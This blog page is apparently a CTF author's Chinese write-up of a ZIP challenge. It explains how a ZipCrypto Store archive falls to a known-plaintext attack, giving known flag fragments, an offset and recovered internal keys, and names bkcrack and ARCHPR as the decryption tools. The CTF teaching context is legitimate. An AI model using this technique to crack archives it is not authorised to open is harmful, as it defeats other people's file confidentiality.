<p>打开flag.zip，就是flag.txt<br>这里不是伪加密也爆破不出来，因为密码是20位字母+数字+特殊字符<br>用7z打开可以看到详细信息<br> <img src="http://120.27.243.85:11111/i/2022/04/18/o141m6_0.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到算法是ZipCrypto Store<br>这种算法不如AES256安全，可以进行明文攻击</p>
<p>一般明文攻击需要压缩包内有已知文件，而明文攻击深入利用只需要8+4一共12个字节就可以爆破出来，结合题目“两部分的flag”，第一部分flag{y0u正好是8个字节，第二部分我选择plaintext一方面9个字节可以加快爆破速度，另一方面可以提示明文攻击。</p>
<p>题目描述里的*对应数量，plaintext偏移量可以数出来是21<br>接下来就是爆破了，大概22分钟就能跑出来了<br>可以爆破出三段密钥：48968f07  fe22a0fd  8aea9d7e<br>直接根据密钥用bkcrack或者ARCHPR都可以得到flag.txt<br> <img src="http://120.27.243.85:11111/i/2022/04/18/o1465f_0.png" srcset="/img/loading.gif" lazyload></p>
<p>拿到密钥后也可以用ARCHPR输入三段密钥，选择“使用这些密钥解密ZIP档案文件”<br>就可以得到解密后的ZIP文件<br><img src="http://120.27.243.85:11111/i/2022/04/18/o1491a_0.png" srcset="/img/loading.gif" lazyload></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/05/06/%E4%B8%AD%E5%9B%BD%E6%B5%B7%E6%B4%8B%E5%A4%A7%E5%AD%A6CTF%E6%A0%A1%E8%B5%9B%E5%A4%8D%E7%8E%B0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">中国海洋大学CTF校赛复现</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/29/DASCTF%20Sept%20X%20%E6%B5%99%E6%B1%9F%E5%B7%A5%E4%B8%9A%E5%A4%A7%E5%AD%A6%20%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">
                        <span class="hidden-mobile">DASCTF Sept X 浙江工业大学 题目复现</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>hexo</span></a> <i class="iconfont icon-love"></i> <a href="http://www.gofervor.com/" target="_blank" rel="nofollow noopener"><span>b1ub1u</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        皖ICP备2021017950号
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>














  
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicRibbon.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicLine.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/snowflake.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/containsWord.min.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/nico.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
